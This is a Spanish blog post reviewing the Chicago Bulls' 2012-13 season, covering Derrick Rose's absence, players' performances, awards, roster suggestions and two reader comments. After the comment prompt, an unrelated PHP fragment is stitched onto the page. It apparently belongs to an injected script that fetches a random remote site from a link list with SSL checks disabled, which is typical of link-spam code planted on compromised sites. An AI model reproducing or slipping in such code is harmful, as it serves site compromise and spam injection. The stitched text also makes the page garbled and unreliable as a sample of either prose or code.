Chicago Bulls: Notable

25 de July de 2013 por Simon

Dudas, muchas dudas se nos plantean a la hora de calificar la temporada de Chicago Bulls pero al final nos hemos decantado por mirar el vaso lleno. Objetivamente en cuanto a resultados deportivos el rendimiento fue inmejorable, los “peros” que nos han creado tantas dudas son casos como el culebrón Derrick  “The Unreturned” Rose y  la incapacidad de la franquicia para  dar el paso final que necesitan, pues para eso es necesario arriesgar un poco más y no parece que lo vayan a hacer como ha quedado plasmado en casos como el de Nate Robinson esta temporada o Omer Asik la pasada. 

Nos gusta terminar los análisis con buen sabor de boca así que vamos a comenzar primero con los puntos negros. Muchos aficionados de Chicago andan muy crispados con el tema de la lesión de Derrick Rose. Que el ex-MVP tenía una lesión muy seria era algo que todos sabíamos. La posibilidad de que no volviera en toda la temporada era algo más que plausible desde el comienzo. El problema viene cuando tanto la franquicia, Adidas y el mismo Derrick Rose han estado jugando con la ilusión de la gente durante toda la temporada. Campañas como “The Return”, las constantes declaraciones del mismo Rose o de personal de la franquicia anunciando una posible e inminente vuelta a las canchas incluso durante la mismísima semifinal de conferencia han hecho que los aficionados acabaran la temporada muy crispados y con la sensación de que se han estado riendo de ellos para mantener activa la máquina de hacer dinero que es Rose, tanto para Chicago como sobretodo para Adidas. Seguro que sin la posibilidad de vuelta de Rose, la venta de entradas, camisetas y demás parafernalias como líneas de ropa, zapatillas, etc. se hubieran visto considerablemente reducidas. No obstante la decisión de no volver a jugar esta temporada parece sensata en el fondo. Si esa rodilla no estaba al 100% lo mejor era no forzar  pues aún está en la mente de todo el mundo los casos de Brandon Roy o Greg Oden que por acortar plazos en algunas ocasiones, sus carreras han terminado antes de la cuenta.

Así, una vez aparcado el culebrón Rose vamos a ver qué tal le fue a los Bulls en la cancha, donde las cosas sí que salieron mejor de lo esperado. En nuestro análisis les dábamos 40 victorias y al final fueron 45, les veíamos luchando por el octavo puesto y finalmente fueron quintos, su techo parecía la primera ronda con suerte y al final cayeron en semifinales de conferencia. Chicago ha sabido sacar el máximo partido a las herramientas que tenían, sus señas de identidad han continuado siendo las mismas que en campañas precedentes pero sin el talento de Rose. Defensa, intensidad y orgullo han sido las tres patas sobre las que se ha asentado su temporada. Los Bulls han sido el segundo equipo de la liga que menos puntos ha anotado por partido y el tercero al que menos le han anotado. El entramado defensivo de Thibodeau sigue funcionando a la perfección, tan sólo la falta de talento anotador les ha lastrado para llegar a cotas más altas.

Todo el mundo parece haber rendido al máximo de sus posibilidades esta temporada. Luol Deng y Carlos Boozer han sido los máximos anotadores y líderes del equipo. Acostumbrados a un papel mucho más secundario este año se han visto obligados a dar un paso adelante y convertirse en la referencia de sus compañeros. Boozer ha cerrado una más que decente temporada promediando 16 puntos y 10 rebotes y Luol Deng ha cuajado una gran temporada con elección para el All-Star Game incluida.  Sus promedios han sido de 16 puntos, 6 rebotes y 3 asistencias, números nada despreciables para un jugador cuya influencia va mucho más allá de los números. El pívot francés Joakim Noah, a pesar de perderse algunos partidos debido a una lesión, ha sido un año más el referente defensivo en la pista del equipo de Thibodeau. También ha visto reconocido su esfuerzo con la participación en el All-Star Game y ha sido seleccionado para el mejor quinteto defensivo de la temporada. Detrás de este particular trío de líderes, se encontraban unos cuantos guerreros que a base de fuerza, intensidad y momentos de genialidad  se hicieron un hueco en el equipo y un poco en el corazón de los aficionados a la NBA. Nate Robinson encontró en Chicago un caldo de cultivo ideal para explotar todo su talento. El pequeñín daba ese toque de genialidad que a veces faltaba en Chicago y conforme fue pasando la temporada su rol en el equipo fue ganando importancia. Belinelli aportó anotación y tiro exterior aunque de manera irregular algunas veces. Hinrich y Hamilton aportaron lo que pudieron pero físicamente ya no están para muchos trotes, sobre todo en el caso del escolta. La mayor sorpresa de la temporada fue Jimmy Butler. El joven alero se ha destapado como un gran jugador defensivo capaz de ejercer de “stopper” ante cualquier estrella exterior de la liga y encima ayudando en ataque cuando es necesario. Sus números e importancia fueron “in crescendo” toda la temporada. En los primeros tres meses de competición apenas superaba los 15 minutos de juego por noche para acabar los últimos meses con promedios de más de 42 minutos por juego llegando a jugar varios partidos de Play Off consecutivos los 48 minutos debido a los problemas de salud de Luol Deng.

Una vez en Play Off, el objetivo estaba cumplido y el batacazo del año anterior ante los 76ers podía hacer pensar que apenas iban a ser rival para unos Brooklyn Nets que volvían a la élite tras varios años navegando por los fondos de la conferencia Este. El resultado de aquella primera serie ya nos encargamos de analizarlo en su momento pero el caso es que los Bulls a base de casta y orgullo terminaron por llevarse la serie. Las semifinales, agotados por la dura primera ronda, las bajas y a que enfrente tenían al vigente y futuro campeón, Miami Heat, se les hicieron muy cuesta arriba y cerraron una temporada que ha sido decepcionante e ilusionante a la par para los aficionados de Chicago.

PREMIOS

MVP: Se lo vamos a dar a Carlos Boozer. No es un primer espada pero le tocó ejercer de ello. Aún así respondió  de forma más que decente liderando a este grupo durante toda la temporada.

Sorpresa: Jimmy Butler. Parece que aquí tenemos jugador para rato. Sin duda ha cuajado una gran temporada yendo de menos a más, marcándose algunos partidos memorables enfrentándose de tu a tu a los mejores jugadores de la liga.

Decepción: Derrick Rose. Y es que para mantener su estatus publicitario ha permitido que se jugara con su imagen alimentando las posibilidades de una vuelta a las canchas que no se produjo y que ahora dudo de si realmente en algún momento esa posibilidad existió de manera real.

Esfuerzo en vano: A todo el equipo, en especial a Joakim Noah, Jimmy Butler y Nate Robinson. Jugar lesionados, disputar gran cantidad de minutos sin descanso y sin desfallecer  o guiar al equipo en Play Off son algunos de los méritos que han hecho estos jugadores.

Jugando a GM

Si Derrick Rose vuelve a tope la temporada que viene el equipo se convertiría en uno de los grandes favoritos al título de manera inmediata así que ¿por qué tocar algo  que funciona? El rumbo de la franquicia en estos últimos años ha sido el de prescindir de todo gasto “extra” sin apostar más de lo estrictamente necesario y la política no creo que vaya a cambiar nada.

  • El único movimiento hasta el momento es la incorporación de Mike Dunleavy, que mejora en mucho las prestaciones que nos ofrecía Belinelli.
  • Hamilton ha sido cortado, apenas ha aportado y su falta no supondrá ningún lastre por lo que el movimiento no pasa de ser anecdótico en lo deportivo.
  • Robinson habría supuesto un gran complemento a Rose y Hinrich pero parece que su destino está en Denver. Se me ocurre el nombre de Gary Neal para reforzar la posición de base/escolta.
  • Su cotización está a la  baja, por lo que DeJuan Blair podría ser una buena pieza para completar nuestra rotación interior sin suponer un esfuerzo económico excesivo.
  • Me gustaría y mucho la opción de traer a Aldridge a Chicago pero siendo realistas es verdaderamente complicado que esta operación llegue a buen puerto, por el estaría dispuesto a dar a Boozer o Deng. Pero siendo realistas, ninguno de los dos jugadores es lo que está buscando Portland.
El equipo nos quedaría así:

Rose/Hinrich/Teague
Butler/Neal/Snell
Deng/Dunleavy
Boozer/Gibson
Noah/Blair/Mohammed

Comenta

2 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Si vuelve D-Rose a tope el año que viene, Chicago se une directamente a los Pacers como claros rivales en el Este para los Heat. Luego está el tema Nets, que yo creo que se la van a pegar, pero bueno, a ver qué pasa. Y Heat ojo porque también huelen a decepción el año que viene. No se puede pretender tener el mismo equipo y que rinda durante 4 años llegando a tres finales y ganando dos. Este verano había que arriesgar y no lo han hecho. El año que viene batacazo seguro

      Citar

  2. r_miller dice:
    #2

    Pienso lo mismo que Simon solo que yo les habría puesto un Sobresaliente. Lo que ha demostrado este equipo es increíble. Ganar a unos Nets como lo hicieron luchando todos los balones y ganando un partido en Miami con medio equipo sin contar lo de Rose es simplemente espectacular. Si Lakers i Knicks lucharan 1/10 de lo que Chicago los Lakers abrian ganado 70 partidos y los knicks se podrian haber medido de tu a tu a Miami en play-offs

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>